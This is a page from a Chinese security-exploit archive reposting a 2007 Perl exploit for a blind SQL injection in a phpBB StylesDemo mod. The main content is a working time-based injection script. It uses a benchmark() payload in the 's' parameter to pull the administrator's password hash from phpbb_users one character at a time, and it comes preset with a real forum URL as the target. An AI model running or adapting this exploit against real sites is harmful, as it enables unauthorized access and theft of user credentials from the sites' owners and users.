首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit 来源：Http://www.inj3ct-it.org 作者：nexen 发布时间：2007-09-19   #--------------------------------------------------------------- # ____            __________         __             ____  __   #/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ # |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\ # |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  # |___|___|  /\__|  /______  /\___  >__|            |___||__|  #          \/\______|      \/     \/                           #--------------------------------------------------------------- # #Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org # #-------------------------------------------------------------- # #Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites # #--------------------------------------------------------------- # # Coded by nexen # # GreetZ: Rossi46go for code # # Description: # #XSS and SQL Injection # #--------------------------------------------------------------- # # # # #--------------------------------------------------------------- #exploit.pl #--------------------------------------------------------------- # # # use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; ######################################## CONFIGURAZIONE EXPLOIT ########################################################################## $sito = "http://www.forumup.com/stylesdemo/"; # insert vulnerable site as http://[site]/[path]/ ########################################################################################################################################## $var = "1"; my $hash; @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); sub richiesta { $var = $_[0]; $ua = LWP::UserAgent->new; $inizio=Time::HiRes::time(); $response = $ua->request(GET $var, s => $var); $response->is_success() || print("$!\n"); $fine=Time::HiRes::time(); $tempo=$fine-$inizio; return $tempo } sub aggiorna{ system("cls"); print "Tempo sql : " . $_[4] . " secondi\n"; print "Hash : " . $_[3] . "\n"; } #print richiesta; for ($i=1;$i<33;$i++) { for ($j=0;$j<16;$j++) { $var=$sito."index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*"; $tempo=richiesta($var); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $tempo=richiesta($var); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $hash .=chr($array[$j]); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); $j=200; } } } if($i==1) { if($hash eq "") { $i=200; print "Attacco Fallito Sito Fixato\n"; } } } print "Attacco Terminato\n\n"; system("pause");   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple Quicktime /w IE .qtl Ver ·Airsensor M520 HTTPD Remote Pr ·MW6 Technologies QRCode Active ·jetAudio 7.x ActiveX DownloadF ·Shop-Script FREE <= 2.0 Remote ·Yahoo! Messenger 8.1.0.421 CYF ·Omnistar Article Manager Softw ·>Mercury/32 4.52 IMAPD SEARCH ·KwsPHP 1.0 stats Module Remote ·Microsoft Visual Basic Enterpr ·KwsPHP 1.0 Member_Space Module ·Sun jre1.6.0_X isInstalled.dns   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved